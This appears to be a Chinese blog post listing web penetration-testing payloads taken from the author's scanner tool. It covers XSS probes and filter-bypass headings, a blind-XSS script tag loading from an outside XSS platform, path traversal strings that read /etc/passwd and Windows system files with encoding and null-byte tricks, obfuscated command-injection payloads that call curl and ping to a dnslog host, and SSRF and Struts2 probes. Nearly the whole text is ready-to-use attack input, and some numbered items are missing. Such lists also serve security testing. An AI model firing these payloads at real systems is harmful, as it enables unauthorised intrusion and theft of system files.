web渗透测试常用payload

常用web漏洞测试的payload整理，把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来，供大家测试时参考。

[反射型xss]

[在html形成]

1. "'>
3. ";>

[在js形成]

1. document.title= "[random]"; //
2. ; document.title= "[random]"; //
3. ";document.title="[random] ";
4. ';document.title="[random] ";
5. "); document.title= "[random]";
6. ');document.title="[random]";

[在html属性形成(img)]

1. 888 " οnlοad=document.title="[random] " a="
2. 888 ' οnlοad=document.title="[random]" a='
3. 888 οnlοad= document.title= "[random]"

[存储型xss]
[通用payload]

测试环境，需要在触发的地方查看payload显示情况

4. [Bypass on Event] [事件型绕过]
5. #一般富文本不会过滤img标签
8. [Bypass pseudo protocol] [伪协议绕过]
14. [Bypass html5 tag] [html5标签绕过]
19. [Bypass html or js encode] [js编码，html编码，十进制编码绕过等]
25. 如果进行盲测可以根据xss平台地址替换相应的js触发代码
26. "> <script src=http://myxss.net/xxxxxx> script>

[静态文件读取]

1. [常规检测]
2. /../../../../../../../../../../../etc/passwd
3. /../../../../../../../../../../../etc/hosts
4. /../../../../../../../C: /Windows/system.ini [windows]
7. [伪造绕过]
8. /././././././././././././././././././././././././../../../../../../../../etc/passwd
9. /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
10. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
11. /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
12. /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
13. /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts

[后缀绕过]

1. /../../../../../../../../../../../etc/passwd #
2. /../../../../../../../../../../../etc/passwd%00
3. /../../../../../../../../../../../etc/passwd #.jpg
4. /../../../../../../../../../../../etc/passwd%00.jpg
5. /../../../../../../../../../../../etc/passwd #.html
6. /../../../../../../../../../../../etc/passwd%00.html
7. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #
8. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #.jpg
9. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #.html
10. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
11. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html

[命令执行漏洞]

1. [常规检测]
2. ;curl [random].test.dnslog.link
3. | curl [random].test.dnslog.link
4. | ping -n 2 [random].test.dnslog.link [Windows]
5. | ping -c 2 [random].test.dnslog.link [Linux]
8. [绕过检测]
9. ;curl [random].test.dnslog.link #
10. | curl [random].test.dnslog.link #
11. %20|%20curl%20[random].test.dnslog.link
12. %20|%20curl%20[random].test.dnslog.link #
13. %20|%20ping%20-n%202%20[random].test.dnslog.link
14. %20|%20ping%20-c%202%20[random].test.dnslog.link #
15. a=p;b=ing;c=c;d= 2;$a$b -$c $d [random].test.dnslog.link
16. a=c;b=url;$a$b [random].test.dnslog.link #
17. ${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
18. ${IFS}|${IFS}ping${IFS}-c${IFS} 2${IFS}[random].test.dnslog.link
19. a=p;b=ing;c=c;d= 2;$a$b {IFS}-$c {IFS}$d {IFS}[random].test.dnslog.link
20. a=c;b=url;$a$b {IFS}[random].test.dnslog.link #

[ssrf漏洞]

http://[random].test.dnslog.link/

[strust2命令执行]

?redirect:http://[random].test.dnslog.link/%25{3*4}